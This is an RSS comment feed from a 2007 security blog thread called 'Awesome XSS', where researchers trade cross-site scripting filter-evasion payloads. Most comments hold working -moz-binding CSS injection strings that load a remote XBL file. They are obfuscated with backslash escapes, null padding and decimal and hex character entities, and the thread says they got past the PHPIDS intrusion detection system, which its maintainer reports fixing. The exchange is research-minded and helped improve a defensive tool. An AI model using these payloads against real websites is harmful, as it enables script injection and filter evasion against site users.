<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>
<channel>
	<title>Comments on: Awesome XSS</title>
	<atom:link href="http://www.thespanner.co.uk/2007/11/24/awesome-xss/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.thespanner.co.uk/2007/11/24/awesome-xss/</link>
	<description>A tool for designers dealing with programmers dealing with designers...</description>
	<pubDate>Tue, 14 Oct 2008 01:54:07 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.2</generator>
		<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-922</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Mon, 26 Nov 2007 12:42:44 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-922</guid>
		<description>I've added this functionality to Hackvertor as a tag (backslashesc) under filter evasion:-

&#60;div/style=&#60;@backslashesc&#62;-moz-binding&#60;@/backslashesc&#62;:&#60;@backslashesc&#62;url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)&#60;@/backslashesc&#62;&#62;

Much easier than having to remember which characters can be escaped ;)</description>
		<content:encoded><![CDATA[<p>I&#8217;ve added this functionality to Hackvertor as a tag (backslashesc) under filter evasion:-</p>
<p>&lt;div/style=&lt;@backslashesc&gt;-moz-binding&lt;@/backslashesc&gt;:&lt;@backslashesc&gt;url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)&lt;@/backslashesc&gt;&gt;</p>
<p>Much easier than having to remember which characters can be escaped <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: .mario</title>
		<link>http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-915</link>
		<dc:creator>.mario</dc:creator>
		<pubDate>Mon, 26 Nov 2007 08:36:38 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-915</guid>
		<description>Eew... that's indeed incredible! We need that ones for the xssDB!</description>
		<content:encoded><![CDATA[<p>Eew&#8230; that&#8217;s indeed incredible! We need that ones for the xssDB!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-914</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Mon, 26 Nov 2007 01:48:04 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-914</guid>
		<description>&#60;x/style=-\m\000000o\000000z\000000-b\000000i\000000nd\000000i\000000n\000000g\000000:\000000u\000000r\000000l\000000(\000000/\000000/b\000000u\000000s\000000i\000000ne\000000s\000000s\000000i\000000nf\000000o\000000.c\000000o\000000.\000000u\000000k\000000/\000000la\000000b\000000s\000000/\000000x\000000b\000000l\000000/\000000x\000000b\000000l\000000.\000000x\000000m\000000l\000000#\000000x\000000s\000000s\000000)&#62;</description>
		<content:encoded><![CDATA[<p>&lt;x/style=-\m\000000o\000000z\000000-b\000000i\000000nd\000000i\000000n\000000g\000000:\000000u\000000r\000000l\000000(\000000/\000000/b\000000u\000000s\000000i\000000ne\000000s\000000s\000000i\000000nf\000000o\000000.c\000000o\000000.\000000u\000000k\000000/\000000la\000000b\000000s\000000/\000000x\000000b\000000l\000000/\000000x\000000b\000000l\000000.\000000x\000000m\000000l\000000#\000000x\000000s\000000s\000000)&gt;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-913</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Mon, 26 Nov 2007 01:32:25 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-913</guid>
		<description>Believe it or not this is also a working mozbinding lol :-
&#60;x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)&#62;</description>
		<content:encoded><![CDATA[<p>Believe it or not this is also a working mozbinding lol :-<br />
&lt;x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)&gt;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-912</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Mon, 26 Nov 2007 01:12:18 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-912</guid>
		<description>Hehe a hacker always attacks at the most inconvenient time ;)</description>
		<content:encoded><![CDATA[<p>Hehe a hacker always attacks at the most inconvenient time <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: .mario</title>
		<link>http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-910</link>
		<dc:creator>.mario</dc:creator>
		<pubDate>Sun, 25 Nov 2007 22:01:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-910</guid>
		<description>Gareth you bandit ;) Hacking the PHPIDS while i visit my grams place *g* 

Well done and of course fixed by now!

Thanks and Greetings,
.mario</description>
		<content:encoded><![CDATA[<p>Gareth you bandit <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> Hacking the PHPIDS while i visit my grams place *g* </p>
<p>Well done and of course fixed by now!</p>
<p>Thanks and Greetings,<br />
.mario</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Information security</title>
		<link>http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-909</link>
		<dc:creator>Information security</dc:creator>
		<pubDate>Sun, 25 Nov 2007 11:10:21 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-909</guid>
		<description>A tool to automate your XSS hacking/testing attempts based on the ha.ckers.org xss attacks xml. If its getting easier to test for XSS vulnerabilities, then its getting easier to exploit those vulnerabilities.</description>
		<content:encoded><![CDATA[<p>A tool to automate your XSS hacking/testing attempts based on the ha.ckers.org xss attacks xml. If its getting easier to test for XSS vulnerabilities, then its getting easier to exploit those vulnerabilities.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-908</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Sun, 25 Nov 2007 01:37:19 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-908</guid>
		<description>&#60;div&#38;nbsp &#38;nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&#62;

&#60;Q%^&#038;*(£@!'" style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&#62;</description>
		<content:encoded><![CDATA[<p>&lt;div&amp;nbsp &amp;nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&gt;</p>
<p>&lt;Q%^&#038;*(£@!&#8217;&#8221; style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&gt;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-907</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Sun, 25 Nov 2007 01:17:31 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-907</guid>
		<description>Check these out too :) 

&#60;div/style=&#38;#92&#38;#45&#38;#92&#38;#109&#38;#111&#38;#92&#38;#122&#38;#92&#38;#45&#38;
#98&#38;#92&#38;#105&#38;#92&#38;#110&#38;#100&#38;#92&#38;#105&#38;#110&#38;#92&#38;#103:&#38;
#92&#38;#117&#38;#114&#38;#108&#38;#40&#38;#47&#38;#47&#38;#98&#38;#117&#38;#115&#38;#105&#38;
#110&#38;#101&#38;#115&#38;#115&#38;#92&#38;#105&#38;#92&#38;#110&#38;#102&#38;#111&#38;#46&#38;
#99&#38;#111&#38;#46&#38;#117&#38;#107&#38;#92&#38;#47&#38;#108&#38;#97&#38;#98&#38;#115
&#38;#92&#38;#47&#38;#120&#38;#98&#38;#108&#38;#92&#38;#47&#38;#120&#38;#98&#38;#108&#38;#92
&#38;#46&#38;#120&#38;#109&#38;#108&#38;#92&#38;#35&#38;#120&#38;#115&#38;#115&#38;#41&#38;&#62;

&#60;div style=&#38;#x2D&#38;#x6D&#38;#x6F&#38;#x7A&#38;#x2D&#38;#x62&#38;#x69&#38;#x6E&#38;#x64&#38;
#x69&#38;#x6E&#38;#x67:&#38;#x75&#38;#x72&#38;#x6C&#38;#x28&#38;#x2F&#38;#x2F&#38;#x62&#38;#x75&#38;
#x73&#38;#x69&#38;#x6E&#38;#x65&#38;#x73&#38;#x73&#38;#x69&#38;#x6E&#38;#x66&#38;#x6F&#38;#x2E&#38;
#x63&#38;#x6F&#38;#x2E&#38;#x75&#38;#x6B&#38;#x2F&#38;#x6C&#38;#x61&#38;#x62&#38;#x73&#38;#x2F&#38;
#x78&#38;#x62&#38;#x6C&#38;#x2F&#38;#x78&#38;#x62&#38;#x6C&#38;#x2E&#38;#x78&#38;#x6D&#38;#x6C
&#38;#x23&#38;#x78&#38;#x73&#38;#x73&#38;#x29&#62;</description>
		<content:encoded><![CDATA[<p>Check these out too <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>&lt;div/style=&amp;#92&amp;#45&amp;#92&amp;#109&amp;#111&amp;#92&amp;#122&amp;#92&amp;#45&amp;<br />
#98&amp;#92&amp;#105&amp;#92&amp;#110&amp;#100&amp;#92&amp;#105&amp;#110&amp;#92&amp;#103:&amp;<br />
#92&amp;#117&amp;#114&amp;#108&amp;#40&amp;#47&amp;#47&amp;#98&amp;#117&amp;#115&amp;#105&amp;<br />
#110&amp;#101&amp;#115&amp;#115&amp;#92&amp;#105&amp;#92&amp;#110&amp;#102&amp;#111&amp;#46&amp;<br />
#99&amp;#111&amp;#46&amp;#117&amp;#107&amp;#92&amp;#47&amp;#108&amp;#97&amp;#98&amp;#115<br />
&amp;#92&amp;#47&amp;#120&amp;#98&amp;#108&amp;#92&amp;#47&amp;#120&amp;#98&amp;#108&amp;#92<br />
&amp;#46&amp;#120&amp;#109&amp;#108&amp;#92&amp;#35&amp;#120&amp;#115&amp;#115&amp;#41&amp;&gt;</p>
<p>&lt;div style=&amp;#x2D&amp;#x6D&amp;#x6F&amp;#x7A&amp;#x2D&amp;#x62&amp;#x69&amp;#x6E&amp;#x64&amp;<br />
#x69&amp;#x6E&amp;#x67:&amp;#x75&amp;#x72&amp;#x6C&amp;#x28&amp;#x2F&amp;#x2F&amp;#x62&amp;#x75&amp;<br />
#x73&amp;#x69&amp;#x6E&amp;#x65&amp;#x73&amp;#x73&amp;#x69&amp;#x6E&amp;#x66&amp;#x6F&amp;#x2E&amp;<br />
#x63&amp;#x6F&amp;#x2E&amp;#x75&amp;#x6B&amp;#x2F&amp;#x6C&amp;#x61&amp;#x62&amp;#x73&amp;#x2F&amp;<br />
#x78&amp;#x62&amp;#x6C&amp;#x2F&amp;#x78&amp;#x62&amp;#x6C&amp;#x2E&amp;#x78&amp;#x6D&amp;#x6C<br />
&amp;#x23&amp;#x78&amp;#x73&amp;#x73&amp;#x29&gt;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-906</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Sun, 25 Nov 2007 01:07:58 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-906</guid>
		<description>hehe thanks, you next? :)</description>
		<content:encoded><![CDATA[<p>hehe thanks, you next? <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /></p>
]]></content:encoded>
	</item>
</channel>
</rss>
